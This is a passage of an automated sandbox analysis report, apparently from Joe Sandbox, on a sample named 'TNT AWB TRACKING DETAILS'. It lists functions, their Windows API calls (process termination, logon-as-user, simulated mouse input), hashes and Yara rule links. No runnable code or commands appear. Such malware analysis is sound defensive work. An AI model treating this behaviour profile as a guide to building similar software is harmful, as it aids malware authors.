                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                    • String ID:
                                                    • API String ID: 3311875123-0
                                                    • Opcode ID: 68fc0a1f30a0805e2e08405b2c6008ea87bd76fcd790a9f72e3a1fd54a52873f
                                                    • Instruction ID: 4e56bf0f2ee7b4642eec610bf889e4a63f267afec6dddeef943f08711a7efe3a
                                                    • Opcode Fuzzy Hash: 68fc0a1f30a0805e2e08405b2c6008ea87bd76fcd790a9f72e3a1fd54a52873f
                                                    • Instruction Fuzzy Hash: B551C130A00269FFDF61CF68E988BADBBF5BF05324F144129E8159B290D3788D04EB51
                                                    Function 00EC1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC2612: GetWindowLongW.USER32(?,000000EB), ref: 00EC2623
                                                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 00EC179A
                                                    • GetWindowRect.USER32(?,?), ref: 00EC17FE
                                                    • ScreenToClient.USER32(?,?), ref: 00EC181B
                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00EC182C
                                                    • EndPaint.USER32(?,?), ref: 00EC1876
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                    • String ID:
                                                    • API String ID: 1827037458-0
                                                    • Opcode ID: b33eaf41549d9c640adee9abc5d8b47565a36d52e0cadb18b9af9cc792cc6e77
                                                    • Instruction ID: 488704eecc6e39340104eaba62ccac66eb6f922513ccc56a2042b7d6f297c441
                                                    • Opcode Fuzzy Hash: b33eaf41549d9c640adee9abc5d8b47565a36d52e0cadb18b9af9cc792cc6e77
                                                    • Instruction Fuzzy Hash: FC41B2351043449FD710DF24CC84FBA7BE8FB56764F0446ADFAA8971A2C7319846EB62
                                                    Function 00F4B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ShowWindow.USER32(00F857B0,00000000,01855758,?,?,00F857B0,?,00F4B5A8,?,?), ref: 00F4B712
                                                    • EnableWindow.USER32(?,00000000), ref: 00F4B736
                                                    • ShowWindow.USER32(00F857B0,00000000,01855758,?,?,00F857B0,?,00F4B5A8,?,?), ref: 00F4B796
                                                    • ShowWindow.USER32(?,00000004,?,00F4B5A8,?,?), ref: 00F4B7A8
                                                    • EnableWindow.USER32(?,00000001), ref: 00F4B7CC
                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00F4B7EF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Window$Show$Enable$MessageSend
                                                    • String ID:
                                                    • API String ID: 642888154-0
                                                    • Opcode ID: 76a2bfd6c16627d35b55ff8a6da456e880f4a38c00d60c0c5fd089c254e3e9d4
                                                    • Instruction ID: 70694120f204fcd9adfb2d15c93d15dca8e0c8091f6e58ead1973df22026f04a
                                                    • Opcode Fuzzy Hash: 76a2bfd6c16627d35b55ff8a6da456e880f4a38c00d60c0c5fd089c254e3e9d4
                                                    • Instruction Fuzzy Hash: D0414D34A01244AFDB26CF24C599B957FE1FB45320F1841B9EE488F6A3C731E856EB51
                                                    Function 00F3709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,00F34E41,?,?,00000000,00000001), ref: 00F370AC
                                                      • Part of subcall function 00F339A0: GetWindowRect.USER32(?,?), ref: 00F339B3
                                                    • GetDesktopWindow.USER32 ref: 00F370D6
                                                    • GetWindowRect.USER32(00000000), ref: 00F370DD
                                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00F3710F
                                                      • Part of subcall function 00F25244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F252BC
                                                    • GetCursorPos.USER32(?), ref: 00F3713B
                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00F37199
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                    • String ID:
                                                    • API String ID: 4137160315-0
                                                    • Opcode ID: 1e63fbef31ff725f6b27bf12a4d4ac5580f5198c6faa3f612530e48878cc2f18
                                                    • Instruction ID: 9030a5cfcac66fb29bebe66ce2a33be4c3573bf92da0e4228133040f6315947e
                                                    • Opcode Fuzzy Hash: 1e63fbef31ff725f6b27bf12a4d4ac5580f5198c6faa3f612530e48878cc2f18
                                                    • Instruction Fuzzy Hash: 2231E472509309ABD720EF14DC49F9BB7EAFF89324F000919F98997191C734EA09DB92
                                                    Function 00F18879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00F180A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F180C0
                                                      • Part of subcall function 00F180A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F180CA
                                                      • Part of subcall function 00F180A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F180D9
                                                      • Part of subcall function 00F180A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F180E0
                                                      • Part of subcall function 00F180A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F180F6
                                                    • GetLengthSid.ADVAPI32(?,00000000,00F1842F), ref: 00F188CA
                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00F188D6
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00F188DD
                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00F188F6
                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00F1842F), ref: 00F1890A
                                                    • HeapFree.KERNEL32(00000000), ref: 00F18911
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                    • String ID:
                                                    • API String ID: 3008561057-0
                                                    • Opcode ID: 6194d433288445be92ab9b4eaac0405fca13a0a753b77becc81660179e4fa6d9
                                                    • Instruction ID: 63db387e9fa9bd17f983c17f980975b577a54e59628cc130c6836c9e54a3dae4
                                                    • Opcode Fuzzy Hash: 6194d433288445be92ab9b4eaac0405fca13a0a753b77becc81660179e4fa6d9
                                                    • Instruction Fuzzy Hash: 0F11B136901209FFDB109FA4DD09BFF7BACEB85365F504068E84997111CB329D86EB60
                                                    Function 00F185B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00F185E2
                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00F185E9
                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00F185F8
                                                    • CloseHandle.KERNEL32(00000004), ref: 00F18603
                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F18632
                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00F18646
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                    • String ID:
                                                    • API String ID: 1413079979-0
                                                    • Opcode ID: 74d9406e59029bf3c4677e2992c16fcf7dba0e2cb7d1535f66cb3dbc3545ed76
                                                    • Instruction ID: 4c1a3679a26e2951a18c4b8327b64187e07303687fe3c9575e7c1901b1f39443
                                                    • Opcode Fuzzy Hash: 74d9406e59029bf3c4677e2992c16fcf7dba0e2cb7d1535f66cb3dbc3545ed76
                                                    • Instruction Fuzzy Hash: 9E117F7650020DABDF11CFA4DD49FDE7BA9EF49364F044064FE05A2160C7758DA5EB60
                                                    Function 00F1B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 00F1B7B5
                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00F1B7C6
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F1B7CD
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00F1B7D5
                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00F1B7EC
                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 00F1B7FE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CapsDevice$Release
                                                    • String ID:
                                                    • API String ID: 1035833867-0
                                                    • Opcode ID: 92619ff2ad6e9a23194b278ed97da2891906024cca0a0bc654cbfb5b854515ea
                                                    • Instruction ID: 21fafdf7fe44c531259a31eb56aa159553253d5fa818adb6dc46a408c6b3867a
                                                    • Opcode Fuzzy Hash: 92619ff2ad6e9a23194b278ed97da2891906024cca0a0bc654cbfb5b854515ea
                                                    • Instruction Fuzzy Hash: EC018475E00319BBEB10ABB69C45A5EBFB8EB59361F044075FE08E7291D6309C00DF90
                                                    Function 00EE0162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EE0193
                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00EE019B
                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00EE01A6
                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00EE01B1
                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00EE01B9
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EE01C1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Virtual
                                                    • String ID:
                                                    • API String ID: 4278518827-0
                                                    • Opcode ID: 8c956c1d0cf7e49901ae657e6a01c2afc6700147b845b36233f0493b548a2c0a
                                                    • Instruction ID: 6b3aa5ccf6a1b685fff09fd34ba6d44bd54969793ea8f6d213aff22667568bd6
                                                    • Opcode Fuzzy Hash: 8c956c1d0cf7e49901ae657e6a01c2afc6700147b845b36233f0493b548a2c0a
                                                    • Instruction Fuzzy Hash: C5016CB09027597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A868CBE5
                                                    Function 00F253E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F253F9
                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F2540F
                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00F2541E
                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F2542D
                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F25437
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F2543E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                    • String ID:
                                                    • API String ID: 839392675-0
                                                    • Opcode ID: 8af4022a41d75791048a11a205ebcc1f4dfb594d7a489c058dff46662b1553a7
                                                    • Instruction ID: 410fa040680bcd6a1b8545ef97826273d2021843deb5a8bd8a3588f85d5b9305
                                                    • Opcode Fuzzy Hash: 8af4022a41d75791048a11a205ebcc1f4dfb594d7a489c058dff46662b1553a7
                                                    • Instruction Fuzzy Hash: 48F06D3624015CBBE3205BA29C0DEAB7A7CEBD7B11F000169FE08D105096A01A05A6B5
                                                    Function 00F27230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,?), ref: 00F27243
                                                    • EnterCriticalSection.KERNEL32(?,?,00ED0EE4,?,?), ref: 00F27254
                                                    • TerminateThread.KERNEL32(00000000,000001F6,?,00ED0EE4,?,?), ref: 00F27261
                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00ED0EE4,?,?), ref: 00F2726E
                                                      • Part of subcall function 00F26C35: CloseHandle.KERNEL32(00000000,?,00F2727B,?,00ED0EE4,?,?), ref: 00F26C3F
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F27281
                                                    • LeaveCriticalSection.KERNEL32(?,?,00ED0EE4,?,?), ref: 00F27288
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                    • String ID:
                                                    • API String ID: 3495660284-0
                                                    • Opcode ID: c5cc75d55ef11ea5d23da5d9163718192c6b092bb2cc6f2a8099261246e9cb4e
                                                    • Instruction ID: 5528dff6016b59b576e8237522880207a38085486f203156af00a9ce7ca4679b
                                                    • Opcode Fuzzy Hash: c5cc75d55ef11ea5d23da5d9163718192c6b092bb2cc6f2a8099261246e9cb4e
                                                    • Instruction Fuzzy Hash: 45F0BE3A440616EBE7112B24EC4C9DB7769EF57312B000131F907900A0CBBA1904EB60
                                                    Function 00F18992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F1899D
                                                    • UnloadUserProfile.USERENV(?,?), ref: 00F189A9
                                                    • CloseHandle.KERNEL32(?), ref: 00F189B2
                                                    • CloseHandle.KERNEL32(?), ref: 00F189BA
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00F189C3
                                                    • HeapFree.KERNEL32(00000000), ref: 00F189CA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                    • String ID:
                                                    • API String ID: 146765662-0
                                                    • Opcode ID: 097709a51ee3ff41d6b52a20f3e835bea2f0c115cc775cb3a28788c7e257b600
                                                    • Instruction ID: 844b9db640589b1e8f2fce8aa768e66a8427e54c5ac9a487c2069aabbd8d6293
                                                    • Opcode Fuzzy Hash: 097709a51ee3ff41d6b52a20f3e835bea2f0c115cc775cb3a28788c7e257b600
                                                    • Instruction Fuzzy Hash: 0FE0C93A004009FBE6011FE1EC0C916BBA9FBAA7227104230F61981470CB325424EB50
                                                    Function 00F385ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 00F38613
                                                    • CharUpperBuffW.USER32(?,?), ref: 00F38722
                                                    • VariantClear.OLEAUT32(?), ref: 00F3889A
                                                      • Part of subcall function 00F27562: VariantInit.OLEAUT32(00000000), ref: 00F275A2
                                                      • Part of subcall function 00F27562: VariantCopy.OLEAUT32(00000000,?), ref: 00F275AB
                                                      • Part of subcall function 00F27562: VariantClear.OLEAUT32(00000000), ref: 00F275B7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                    • API String ID: 4237274167-1221869570
                                                    • Opcode ID: d38a8864e790a306af52c4bd12bab2b009ce3523a705ac7c594c575c9b22e0ef
                                                    • Instruction ID: 9c7ea8ba059b076baff9d6e9bedff07238348026e98993fb7f3b352b39eea005
                                                    • Opcode Fuzzy Hash: d38a8864e790a306af52c4bd12bab2b009ce3523a705ac7c594c575c9b22e0ef
                                                    • Instruction Fuzzy Hash: FB91BF71A04301DFCB00DF24C48595ABBE4EF89764F04886DF89A9B362DB35EC46DB52
                                                    Function 00F22A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EDFC86: _wcscpy.LIBCMT ref: 00EDFCA9
                                                    • _memset.LIBCMT ref: 00F22B87
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F22BB6
                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F22C69
                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00F22C97
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                    • String ID: 0
                                                    • API String ID: 4152858687-4108050209
                                                    • Opcode ID: 98859674c609735ed5abd4ff4d956113c434bcace4a817670f6b41835d0e93cb
                                                    • Instruction ID: 6d57fbcf03c734a26d9cc8c6e07eafa50dc664c04f435cc50cf9b52304a9ab27
                                                    • Opcode Fuzzy Hash: 98859674c609735ed5abd4ff4d956113c434bcace4a817670f6b41835d0e93cb
                                                    • Instruction Fuzzy Hash: E351D371908320ABD7A4AF28E845A6F77E4EF95330F040A2DF895E72A1DB74CD44A752
                                                    Function 00ED3137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memmove$_free
                                                    • String ID: 3c$_
                                                    • API String ID: 2620147621-4099079164
                                                    • Opcode ID: 4a4cfbd1c5705831b9e8bcb4121c13949052036b73e4455b8a88dccbea96081a
                                                    • Instruction ID: f40799a2d3430ed4fabeb613ed7ee957dc8340c6cfcea6ce2da8309ad3ca6e0c
                                                    • Opcode Fuzzy Hash: 4a4cfbd1c5705831b9e8bcb4121c13949052036b73e4455b8a88dccbea96081a
                                                    • Instruction Fuzzy Hash: 04516871A043418FDB24CF28C940A6EBBE5EF85314F44582EE999E7351EB35E942CB43
                                                    Function 00ED6192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memset$_memmove
                                                    • String ID: 3c$ERCP
